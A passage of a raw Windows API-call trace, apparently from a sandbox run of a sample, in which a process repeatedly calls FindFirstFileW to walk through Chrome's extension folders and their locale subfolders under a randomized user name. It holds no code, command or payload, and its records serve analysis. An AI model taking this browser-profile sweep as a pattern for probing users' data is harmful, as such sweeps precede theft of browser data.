Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.498] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.499] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.500] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.500] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.500] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.500] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.501] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.501] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.501] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.501] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.501] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.502] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.502] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.502] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.504] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32968 [0153.505] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.505] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0153.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d28 [0153.507] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.507] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0153.507] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0153.507] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.543] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0153.544] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0153.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0153.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0153.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0153.894] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.895] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0153.896] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0153.896] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0153.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0153.954] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0153.954] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0153.954] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.954] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0153.961] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0153.961] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0153.962] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0153.962] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.488] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.488] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.488] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.488] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.489] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.489] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.490] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.490] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.491] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.491] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.491] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.491] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.492] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.492] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.492] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.492] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.493] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.493] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.494] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.494] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.495] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.495] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.495] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.495] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.496] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.496] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.497] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.497] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.557] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.558] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.558] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.621] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.621] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.622] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.622] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.623] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.623] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.623] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.624] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.624] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.625] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.625] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.625] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.626] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.626] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.627] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.627] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.628] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.628] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.628] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.629] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.629] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.630] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.630] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.635] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.635] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.641] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.641] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.641] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.653] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.653] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: 